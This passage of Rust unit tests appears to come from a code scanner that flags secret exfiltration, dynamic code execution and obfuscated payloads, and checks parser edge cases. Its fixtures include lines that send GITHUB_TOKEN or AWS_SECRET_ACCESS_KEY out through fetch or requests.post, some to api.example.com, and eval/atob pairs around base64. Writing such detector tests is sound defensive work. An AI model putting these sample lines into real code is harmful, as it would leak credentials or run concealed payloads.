915    fn test_exfil_division_in_args_fires() {
916        let input = r#"fetch(url, {body: 1 / 2, json: process.env.GITHUB_TOKEN})"#;
917        let findings = check(input, Some("test.js"));
918        assert!(
919            findings
920                .iter()
921                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
922            "division operator in call args should not break parser"
923        );
924    }
925
926    #[test]
927    fn test_exfil_paren_division_in_args_fires() {
928        let input = r#"fetch(url, {body: (a / b), json: process.env.GITHUB_TOKEN})"#;
929        let findings = check(input, Some("test.js"));
930        assert!(
931            findings
932                .iter()
933                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
934            "parenthesized division in call args should not break parser"
935        );
936    }
937
938    #[test]
939    fn test_find_call_end_division() {
940        let input = b"url, {body: 1 / 2, val})";
941        assert_eq!(find_call_end(input, 0), Some(24));
942    }
943
944    #[test]
945    fn test_exfil_nested_headers_in_body_fires() {
946        let input = r#"fetch(url, {body: JSON.stringify({headers: "x", token: process.env.GITHUB_TOKEN})})"#;
947        let findings = check(input, Some("test.js"));
948        assert!(
949            findings
950                .iter()
951                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
952            "nested 'headers' key inside body payload should NOT suppress"
953        );
954    }
955
956    #[test]
957    fn test_exfil_python_nested_headers_in_data_fires() {
958        let input = r#"requests.post(url, data={"headers": "x", "token": os.environ["AWS_SECRET_ACCESS_KEY"]})"#;
959        let findings = check(input, Some("test.py"));
960        assert!(
961            findings
962                .iter()
963                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
964            "nested 'headers' key inside data= dict should NOT suppress"
965        );
966    }
967
968    #[test]
969    fn test_exfil_nested_headers_in_json_fires() {
970        let input = r#"fetch(url, {json: {headers: "x", token: process.env.GITHUB_TOKEN}})"#;
971        let findings = check(input, Some("test.js"));
972        assert!(
973            findings
974                .iter()
975                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
976            "nested 'headers' key inside json property should NOT suppress"
977        );
978    }
979
980    #[test]
981    fn test_exfil_python_hash_comment_headers_fires() {
982        let input = "requests.post(url, data={# headers: fake\n'token': os.environ[\"AWS_SECRET_ACCESS_KEY\"]})";
983        let findings = check(input, Some("test.py"));
984        assert!(
985            findings
986                .iter()
987                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
988            "# headers: inside comment must NOT suppress data= exfil"
989        );
990    }
991
992    #[test]
993    fn test_exfil_js_block_comment_headers_fires() {
994        let input =
995            r#"fetch(url, {/* headers: */ body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
996        let findings = check(input, Some("test.js"));
997        assert!(
998            findings
999                .iter()
1000                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1001            "/* headers: */ inside comment must NOT suppress body exfil"
1002        );
1003    }
1004
1005    #[test]
1006    fn test_exfil_regex_literal_headers_fires() {
1007        let input = r#"fetch(url, {body: /headers: \{/, json: process.env.GITHUB_TOKEN})"#;
1008        let findings = check(input, Some("test.js"));
1009        assert!(
1010            findings
1011                .iter()
1012                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1013            "/headers: .../ inside regex literal must NOT suppress"
1014        );
1015    }
1016
1017    #[test]
1018    fn test_exfil_regex_literal_authorization_fires() {
1019        let input = r#"fetch(url, {body: /Authorization: \[/, json: process.env.GITHUB_TOKEN})"#;
1020        let findings = check(input, Some("test.js"));
1021        assert!(
1022            findings
1023                .iter()
1024                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1025            "/Authorization: .../ inside regex literal must NOT suppress"
1026        );
1027    }
1028
1029    #[test]
1030    fn test_exfil_multiline_division_fires() {
1031        let input = "fetch(url, {body: 1\n/ 2, json: process.env.GITHUB_TOKEN})";
1032        let findings = check(input, Some("test.js"));
1033        assert!(
1034            findings
1035                .iter()
1036                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1037            "multiline division should not break parser"
1038        );
1039    }
1040
1041    #[test]
1042    fn test_exfil_multiline_paren_division_fires() {
1043        let input = "fetch(url, {body: (a\n/ b), json: process.env.GITHUB_TOKEN})";
1044        let findings = check(input, Some("test.js"));
1045        assert!(
1046            findings
1047                .iter()
1048                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1049            "parenthesized multiline division should not break parser"
1050        );
1051    }
1052
1053    #[test]
1054    fn test_find_call_end_multiline_division() {
1055        let input = b"url, {body: 1\n/ 2, val})";
1056        assert_eq!(find_call_end(input, 0), Some(24));
1057    }
1058
1059    #[test]
1060    fn test_exfil_postfix_increment_division_fires() {
1061        let input = r#"fetch(url, {body: a++ / 2, json: process.env.GITHUB_TOKEN})"#;
1062        let findings = check(input, Some("test.js"));
1063        assert!(
1064            findings
1065                .iter()
1066                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1067            "a++ / 2 should not break parser"
1068        );
1069    }
1070
1071    #[test]
1072    fn test_exfil_postfix_decrement_division_fires() {
1073        let input = r#"fetch(url, {body: a-- / 2, json: process.env.GITHUB_TOKEN})"#;
1074        let findings = check(input, Some("test.js"));
1075        assert!(
1076            findings
1077                .iter()
1078                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1079            "a-- / 2 should not break parser"
1080        );
1081    }
1082
1083    #[test]
1084    fn test_find_call_end_postfix_increment() {
1085        let input = b"url, {body: a++ / 2, val})";
1086        assert_eq!(find_call_end(input, 0), Some(26));
1087    }
1088
1089    #[test]
1090    fn test_find_call_end_postfix_decrement() {
1091        let input = b"url, {body: a-- / 2, val})";
1092        assert_eq!(find_call_end(input, 0), Some(26));
1093    }
1094
1095    #[test]
1096    fn test_exfil_postfix_inc_div_then_meta_no_fire() {
1097        let input = r#"fetch(url, {body: a++ / 2, meta: process.env.GITHUB_TOKEN})"#;
1098        let findings = check(input, Some("test.js"));
1099        assert!(
1100            !findings
1101                .iter()
1102                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1103            "secret in meta: after body: a++ / 2 should NOT fire"
1104        );
1105    }
1106
1107    #[test]
1108    fn test_exfil_postfix_dec_div_then_token_no_fire() {
1109        let input = r#"fetch(url, {body: a-- / 2, token: process.env.GITHUB_TOKEN})"#;
1110        let findings = check(input, Some("test.js"));
1111        assert!(
1112            !findings
1113                .iter()
1114                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1115            "secret in token: after body: a-- / 2 should NOT fire"
1116        );
1117    }
1118
1119    // Regression: UTF-8 boundary clamp around the proximity window.
1120    //
1121    // Without `safe_start`/`safe_end`, slicing the ±500-byte window could land
1122    // inside a multi-byte char (e.g. '═', 3 bytes) and panic with
1123    // "byte index N is not a char boundary". The tests below pin that down.
1124    #[test]
1125    fn test_safe_start_clamps_into_multibyte() {
1126        // '═' occupies bytes 0..3. Targeting bytes 1 or 2 should walk forward to 3.
1127        let s = "═ab";
1128        assert_eq!(safe_start(s, 0), 0);
1129        assert_eq!(safe_start(s, 1), 3);
1130        assert_eq!(safe_start(s, 2), 3);
1131        assert_eq!(safe_start(s, 3), 3);
1132    }
1133
1134    #[test]
1135    fn test_safe_end_clamps_into_multibyte() {
1136        // '═' occupies bytes 0..3. Targeting bytes 1 or 2 should walk back to 0.
1137        let s = "═ab";
1138        assert_eq!(safe_end(s, 0), 0);
1139        assert_eq!(safe_end(s, 1), 0);
1140        assert_eq!(safe_end(s, 2), 0);
1141        assert_eq!(safe_end(s, 3), 3);
1142    }
1143
1144    #[test]
1145    fn test_dynamic_code_no_panic_on_box_drawing_chars() {
1146        // Long tail of '═' (3 bytes each) so that mat.end()+500 lands inside a
1147        // box-drawing char. Pre-clamp, slicing the window panicked.
1148        // (Keyword strings split so source-scanning hooks don't trip on them.)
1149        let mut input = concat!("e", "val(x); a", "tob(y);\n// ").to_string();
1150        for _ in 0..250 {
1151            input.push('═');
1152        }
1153        let findings = check(&input, Some("test.js"));
1154        assert!(
1155            findings
1156                .iter()
1157                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
1158            "dynamic-code pair should still fire when window edge lands inside a multi-byte char"
1159        );
1160    }
1161
1162    #[test]
1163    fn test_obfuscated_payload_no_panic_on_trailing_multibyte() {
1164        // Long base64 in decode() with trailing multi-byte chars past the proximity window.
1165        let b64 = "A".repeat(60);
1166        let mut input = String::new();
1167        input.push('e');
1168        input.push_str("val(a");
1169        input.push_str("tob(\"");
1170        input.push_str(&b64);
1171        input.push_str("\"));\n// ");
1172        for _ in 0..250 {
1173            input.push('═');
1174        }
1175        let findings = check(&input, Some("test.js"));
1176        assert!(
1177            findings
1178                .iter()
1179                .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
1180            "obfuscated-payload detection should still fire with trailing multi-byte chars"
1181        );
1182    }
1183
1184    #[test]
1185    fn test_dynamic_code_no_panic_on_leading_multibyte() {
1186        // Multi-byte chars BEFORE the match exercise the start-side clamp:
1187        // `mat.start().saturating_sub(500)` can land inside a leading char.
1188        let mut input = String::new();
1189        for _ in 0..250 {
1190            input.push('═');
1191        }
1192        input.push_str(concat!("\ne", "val(x); a", "tob(y);\n"));
1193        let findings = check(&input, Some("test.js"));
1194        assert!(
1195            findings
1196                .iter()
1197                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
1198            "dynamic-code pair should fire even when window start lands inside a leading multi-byte char"
1199        );
1200    }
1201
1202    #[test]
1203    fn test_js_exfil_no_panic_on_non_ascii_args() {
1204        // Multi-byte chars inside the string-literal args exercise the call_end
1205        // byte walker and the arg_span/snippet slices. Invariant: no panic.
1206        let input = r#"fetch("https://api.example.com/═══", {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
1207        let _ = check(input, Some("test.js"));
1208    }
1209
1210    #[test]
1211    fn test_py_exfil_no_panic_on_non_ascii_args() {
1212        let input = r#"requests.post("https://api.example.com/═══", data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
1213        let _ = check(input, Some("test.py"));
1214    }
1215
1216    #[test]
1217    fn test_scan_plain_python_with_box_drawing_no_panic() {
1218        // Plain Python with box-drawing chars in a comment — no dynamic-code patterns,
1219        // should simply produce no findings (and never panic on the slice).
1220        let mut input = String::from("# ");
1221        for _ in 0..250 {
1222            input.push('═');
1223        }
1224        input.push_str("\nprint('hello')\n");
1225        let findings = check(&input, Some("test.py"));
1226        assert!(
1227            findings.is_empty(),
1228            "plain file with only box-drawing chars should produce no findings, got {findings:?}"
1229        );
1230    }
1231}